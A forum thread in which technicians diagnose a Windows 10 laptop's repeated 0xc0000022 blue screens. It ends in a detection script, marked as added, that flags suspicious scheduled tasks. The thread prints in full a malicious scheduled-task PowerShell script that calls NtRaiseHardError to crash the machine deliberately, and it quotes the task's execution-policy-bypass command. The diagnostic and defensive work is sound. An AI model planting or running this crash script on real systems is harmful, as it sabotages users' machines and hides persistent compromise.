Windows 10 BSOD 0xc0000022

Big Jim

Have a laptop that is BSOD'ing anywhere between 10 and 60 minutes whilst sat Idle.

Mini dump text

Microsoft (R) Windows Debugger Version 10.0.21349.1004 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.


Loading Dump File [C:\WINDOWS\MEMORY.DMP]
Kernel Bitmap Dump File: Kernel address space is available, User address space may not be available.

Symbol search path is: srv*
Executable search path is:
Windows 10 Kernel Version 19041 MP (4 procs) Free x64
Product: WinNt, suite: TerminalServer SingleUserTS
Edition build lab: 19041.1.amd64fre.vb_release.191206-1406
Machine Name:
Kernel base = 0xfffff803`4fa00000 PsLoadedModuleList = 0xfffff803`5062a290
Debug session time: Tue Jul 6 12:46:04.319 2021 (UTC + 1:00)
System Uptime: 0 days 0:51:49.077
Loading Kernel Symbols
...............................................................
................................................................
................................................................
..............................
Loading User Symbols
................................................................
................
Loading unloaded module list
...............
For analysis of this file, run !analyze -v
nt!KeBugCheckEx:
fffff803`4fdf6b90 48894c2408 mov qword ptr [rsp+8],rcx ss:ffff8281`47abc5a0=000000000000004c
1: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

Unknown bugcheck code (c0000022)
Unknown bugcheck description
Arguments:
Arg1: 0000000000000000
Arg2: 0000000000000000
Arg3: 0000000000000000
Arg4: 0000000000000000

Debugging Details:
------------------


KEY_VALUES_STRING: 1

Key : Analysis.CPU.mSec
Value: 5780

Key : Analysis.DebugAnalysisManager
Value: Create

Key : Analysis.Elapsed.mSec
Value: 18251

Key : Analysis.Init.CPU.mSec
Value: 1499

Key : Analysis.Init.Elapsed.mSec
Value: 76476

Key : Analysis.Memory.CommitPeak.Mb
Value: 85

Key : WER.OS.Branch
Value: vb_release

Key : WER.OS.Timestamp
Value: 2019-12-06T14:06:00Z

Key : WER.OS.Version
Value: 10.0.19041.1


ERROR_CODE: (NTSTATUS) 0xc0000022 - {Access Denied} A process has requested access to an object, but has not been granted those access rights.

EXCEPTION_CODE_STR: c0000022

EXCEPTION_PARAMETER1: 0000000000000000

EXCEPTION_PARAMETER2: 0000000000000000

EXCEPTION_PARAMETER3: 0000000000000000

EXCEPTION_PARAMETER4: 0

BUGCHECK_CODE: c0000022

BUGCHECK_P1: 0

BUGCHECK_P2: 0

BUGCHECK_P3: 0

BUGCHECK_P4: 0

BLACKBOXBSD: 1 (!blackboxbsd)


BLACKBOXNTFS: 1 (!blackboxntfs)


BLACKBOXPNP: 1 (!blackboxpnp)


BLACKBOXWINLOGON: 1

PROCESS_NAME: powershell.exe

STACK_TEXT:
ffff8281`47abc598 fffff803`503af55a : 00000000`0000004c 00000000`c0000022 ffff8281`44c1b3f0 ffff890a`809e8f10 : nt!KeBugCheckEx
ffff8281`47abc5a0 fffff803`503a0f8f : ffff8281`47abc6c0 ffff8281`47abc660 ffff8281`47abc6c0 ffff8281`47abc660 : nt!PopGracefulShutdown+0x29a
ffff8281`47abc5e0 fffff803`503966fc : ffff890a`74d50101 ffff890a`00000006 00000000`00000005 fffff803`00000000 : nt!PopTransitionSystemPowerStateEx+0x11c9f
ffff8281`47abc6a0 fffff803`4fe085b8 : ffff8281`47abc898 ffff3579`881381cb 00000000`00000000 fffff803`50178595 : nt!NtSetSystemPowerState+0x4c
ffff8281`47abc880 fffff803`4fdfa9f0 : fffff803`502315a3 00000000`00000014 ffffffff`ffffff00 fffff803`50620a98 : nt!KiSystemServiceCopyEnd+0x28
ffff8281`47abca18 fffff803`502315a3 : 00000000`00000014 ffffffff`ffffff00 fffff803`50620a98 00000000`00000000 : nt!KiServiceLinkage
ffff8281`47abca20 fffff803`50162729 : 00000000`00000000 ffff890a`74c81900 00000000`00000000 00000000`00000000 : nt!PopIssueActionRequest+0xced5b
ffff8281`47abcac0 fffff803`4fcf3254 : 00000000`00000001 00000000`00000000 ffffffff`ffffffff fffff803`50623b00 : nt!PopPolicyWorkerAction+0x79
ffff8281`47abcb30 fffff803`4fd411b5 : ffff890a`00000001 ffff890a`80df4040 fffff803`4fcf31c0 00000000`00000000 : nt!PopPolicyWorkerThread+0x94
ffff8281`47abcb70 fffff803`4fcf5345 : ffff890a`80df4040 00000000`00000080 ffff890a`74c5c080 000fa425`bd9bbfff : nt!ExpWorkerThread+0x105
ffff8281`47abcc10 fffff803`4fdfe1e8 : ffffd800`39200180 ffff890a`80df4040 fffff803`4fcf52f0 ffff8281`47abcc80 : nt!PspSystemThreadStartup+0x55
ffff8281`47abcc60 00000000`00000000 : ffff8281`47abd000 ffff8281`47ab7000 00000000`00000000 00000000`00000000 : nt!KiStartSystemThread+0x28


SYMBOL_NAME: nt!PopTransitionSystemPowerStateEx+11c9f

MODULE_NAME: nt

IMAGE_NAME: ntkrnlmp.exe

STACK_COMMAND: .thread ; .cxr ; kb

BUCKET_ID_FUNC_OFFSET: 11c9f

FAILURE_BUCKET_ID: STATUS_ACCESS_DENIED_nt!PopTransitionSystemPowerStateEx

OS_VERSION: 10.0.19041.1

BUILDLAB_STR: vb_release

OSPLATFORM_TYPE: x64

OSNAME: Windows 10

FAILURE_ID_HASH: {7fcb0a96-b639-2e09-82d6-2eef48bdcdea}

Followup: MachineOwner

So this is related to some kind of power state change?
I have run a tool to fix permissions but that didn't fix it.
SFC did find and fix problems but the issue is still present.

All drivers have been updated.

The laptop is set to sleep never on battery or power, and also the option to sleep had been removed from the start menu. Advanced power settings all look normal as well.



Any ideas ?
 
When I get a computer in with a weird problem like this, I just do a nuke n' pave. I tell the client that it will *probably* fix the problem, but if it doesn't, I'll put 100% of what they paid for the service towards another computer.

Modern computers are so complicated there's no way to know with 100% certainty what the problem is, or heck, whether it's caused by software or hardware. You can guess and swap parts, but even with a desktop with 100% modular components it's a crap shoot. With a laptop with only a few components that are worth swapping, it's best to just do a nuke n' pave to rule out any software issues and then if the issue persists, just trade the sucker in.

It's all about time vs. money. If it takes me 4 hours to diagnose an issue and I'm not making at least $150/hour on the repair, it's better off to just throw away stuff that might be perfectly good in order to save time.

As much as I love computers and as much as I hate not getting to the bottom of some problems, I'm running a business. It's my responsibility as a business owner to maximize profits while also offering the best value to my client. If one of us is getting the shaft (myself, my client, or the computer), the computer is the obvious choice as it's just an inanimate object at the end of the day.

That being said, you might want to invest in some professional diagnostic software such as Pc-Check or PC Doctor Service Center. These tools have helped me diagnose very weird/intermittent issues and don't take long to run. They're not 100% accurate, but will give you some assurances. If the hardware checks out with these tools, it's an even better indication that you should just do a nuke n' pave to see if it fixes the problem.
 
Event logs? Other things are crashing with this. This is just the final thing that died.

What hardware is this? No offense, but when you have a hardware question just saying that you have a generic laptop on the bench is worthless.

Download and run whocrashed. https://www.resplendence.com/whocrashed
It's a good dump analyzer, better than trying to read a dump by hand.
 
Event logs? Other things are crashing with this. This is just the final thing that died.

What hardware is this? No offense, but when you have a hardware question just saying that you have a generic laptop on the bench is worthless.

Download and run whocrashed. https://www.resplendence.com/whocrashed
It's a good dump analyzer, better than trying to read a dump by hand.
I didn't mention hardware as I don't believe this to be a hardware related problem, the dump says that something asked for permission to do something and it was denied and that is what caused the crash.

FWIW I changed the sleep settings to 30 minutes and it has slept and woke up no problem.
I'll try changing it to 60 minutes sleep and see if the BSOD still happens
 
It's a driver issue, namely a driver with a bad permission on it, or a faulty driver.

You can spend buckets of time booting into preboot, and trying to debug which one... or you can nuke and pave it.
 
Windows is pretty damn stable. These days most BSOD errors are hardware related. Faulty memory or dirty power. And you can get permission errors if the object you are trying to access is missing or crashed.
 
Also, and I'll be the contrarian, again, but I always do a Repair Install with the ISO file before doing a nuke & pave if the hardware in question has a lot of human time and effort already expended in configuring it to its purpose. Way over 90% of the time I've found that is sufficient to do what we have typically had to do a nuke & pave for in the past.

If I suspect something in Windows, the steps are always, in order, and progressing to subsequent ones only if nothing's worked so far:

1. Using SFC (System File Checker) and DISM (Deployment Imaging Servicing and Management) to Repair Windows 8 & 10

2. Doing a Windows 10 Repair Install or Feature Update Using the Windows 10 ISO file

3. Doing a Completely Clean (Re)install of Windows 10 Using Media Creation Tool to Fetch the Win10 ISO File
(and the part about fetching the ISO file has already been done for #2, which is why I'm not using the MCT in this instance to create bootable media. If that's your preference, then go for that route instead).
 
Also, and I'll be the contrarian, again, but I always do a Repair Install with the ISO file before doing a nuke & pave
That doesn't take care of driver or other software issues though. It's very rare that an actual Windows file is the culprit. With all the garbage preloaded on modern computers, not to mention outdated drivers, any of that crap could be causing issues.
 
That doesn't take care of driver or other software issues though.

Correct. But it certainly does give you a pointer as to whether it was a Windows issue or not. And my experience is that, as often as not, it is a corruption, however subtle and irregularly hit, that has crept into the OS.

But, if things keep BSOD-ing, then the nuke and pave is the next option. It's a progression, and one that's worked like a charm for me since the advent of Windows 10.
 
Does this happen in safe mode?
My understanding of the dump is that powershell may be the cause. Are there any background scripts using powershell that run at the time it crashes? What happens if you open powershell?
Have you tried using process monitor https://docs.microsoft.com/en-gb/sysinternals/downloads/procmon to see if that gives any indication of what is getting the access denied error? This may be difficult depending on how much time is between the access denied error and the BSOD.
Is there a restore point you can go back to? If so, check the "affected programs" before doing the restore and that may narrow it down to a recently installed bit of software or a windows update. If reinstalling that software/update check if it does it again or not.
 
I think I found the issue.
There is a task set to run every hour starting at 09:46, it just crashed at 18:46

powershell.exe -executionpolicy bypass -file c:\WINDOWS\TEMP\maint.ps1


Not exactly sure what this is for, however.

This is the text from the file in the task:

$source = @"
using System;
using System.Runtime.InteropServices;
public static class CS{
[DllImport("ntdll.dll")]
public static extern uint RtlAdjustPrivilege(int Privilege, bool bEnablePrivilege, bool IsThreadPrivilege, out bool PreviousValue);
[DllImport("ntdll.dll")]
public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ValidResponseOption, out uint Response);
public static unsafe void Kill(){
Boolean tmp1;
uint tmp2;
RtlAdjustPrivilege(19, true, false, out tmp1);
NtRaiseHardError(0xc0000022, 0, 0, IntPtr.Zero, 6, out tmp2);
}
}
"@
$comparams = new-object -typename system.CodeDom.Compiler.CompilerParameters
$comparams.CompilerOptions = '/unsafe'
$a = Add-Type -TypeDefinition $source -Language CSharp -PassThru -CompilerParameters $comparams
[CS]::Kill()
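
One way to triage the finding in the post above, added here as an example and not part of the original thread: it flags scheduled-task actions that launch PowerShell with an execution-policy override from a temp or writable directory, and checks any referenced script still on disk for the two ntdll calls seen in maint.ps1. The function names and indicator patterns are assumptions of this example; `Get-ScheduledTask`, `Get-ScheduledTaskInfo` and `Select-String` are the standard cmdlets.

```powershell
# Added example, not from the thread. Function names and indicator patterns
# are assumptions of this example; tune the patterns before relying on them.
function Test-SuspiciousTaskAction {
    param([Parameter(Mandatory)][string]$Execute, [string]$Arguments = '')
    $cmd = "$Execute $Arguments"
    if ($cmd -notmatch '\b(powershell|pwsh)(\.exe)?\b') { return }
    $reasons = @()
    # -ExecutionPolicy can be abbreviated (-ex, -exec) or aliased (-ep).
    if ($cmd -match '-(ep|ex\w*)\s+(bypass|unrestricted)') {
        $reasons += 'execution policy overridden'
    }
    # Script kept in a temp or commonly writable directory.
    if ($cmd -match '\\(Windows\\Temp|AppData|ProgramData|Users\\Public)\\|%TE?MP%') {
        $reasons += 'script in temp/writable location'
    }
    # If the -File target is still on disk, look for the ntdll calls that
    # the maint.ps1 posted above uses.
    if ($cmd -match '-f(ile)?\s+"?([^"]+?\.ps1)') {
        $path = $Matches[2]
        if ((Test-Path -LiteralPath $path) -and
            (Select-String -LiteralPath $path -Pattern 'NtRaiseHardError|RtlAdjustPrivilege' -Quiet)) {
            $reasons += 'script calls NtRaiseHardError/RtlAdjustPrivilege'
        }
    }
    $reasons
}

function Get-SuspiciousScheduledTask {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no command line
            $why = Test-SuspiciousTaskAction -Execute $action.Execute -Arguments "$($action.Arguments)"
            if ($why) {
                [pscustomobject]@{
                    Task    = $task.TaskPath + $task.TaskName
                    Author  = $task.Author
                    Command = "$($action.Execute) $($action.Arguments)"
                    LastRun = ($task | Get-ScheduledTaskInfo).LastRunTime
                    Reasons = $why -join '; '
                }
            }
        }
    }
}

# Constructed input: the command line quoted in the post above.
Test-SuspiciousTaskAction -Execute 'powershell.exe' -Arguments '-executionpolicy bypass -file c:\WINDOWS\TEMP\maint.ps1'
# Live audit; run elevated so every task folder is visible.
Get-SuspiciousScheduledTask | Format-List
```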
 
That positively screams malware...
Some odd stuff on this laptop:
Sleep missing from start menu (this was unticked in power settings)
Windows is activated using your company's activation service (normally this says activated with a digital license)
There is some software on there from these guys https://jpt-solutions.com/support/ set to run at startup; looked like remote support software
There was another IT company's web page set to load in a 2nd tab with Chrome as well.

Haven't spoken to customer yet but am wondering if she has been scammed on the phone or if she went to these companies herself. She is a repeat customer who lives locally so I don't see any reason for her to have gone elsewhere; that's not to say it hasn't happened though.
 
@Big Jim Did you look at that link?

"Working Together Beautifully "

That's a VERY Chinese or Korean thing... that's not western in the least. So I suspect you're right, and she got scammed or paid an untrusted source to do some work. Either way... I'm leaning much harder on the nuke and pave button. Going to have to contact the client first of course.
 
Agreed. It's trying to modify ntdll.dll

Check the antivirus logs, if any, for past events. Could be the remnant of a ransomware attack that got kneecapped by the AV. I'm inclined to zero out the drive and reinstall.
Might have succeeded because the laptop originally came to us with a "cannot find OS" error message.
We used a tool to repair the boot files which got it booting again. I think my tech then updated to the latest version of Windows via USB (he is off today so not 100% on that). All AV logs are cleared before 03/07.

It has Kaspersky on it though, and both Kaspersky and Malwarebytes have just detected the same program in Program data "centra stage" csrss32.exe, which as far as I can tell is a legit Windows file that should be in the Windows folder, so this is named the same to fool people.
 
That script looks like it has the instruction to cause that BSOD code if it doesn't get the privileges it wants.
I have no idea what the script wants to do, but it certainly doesn't look legitimate so removing that task should solve that problem. The question remains as to how much other crap is on there and what has been/may have been compromised
 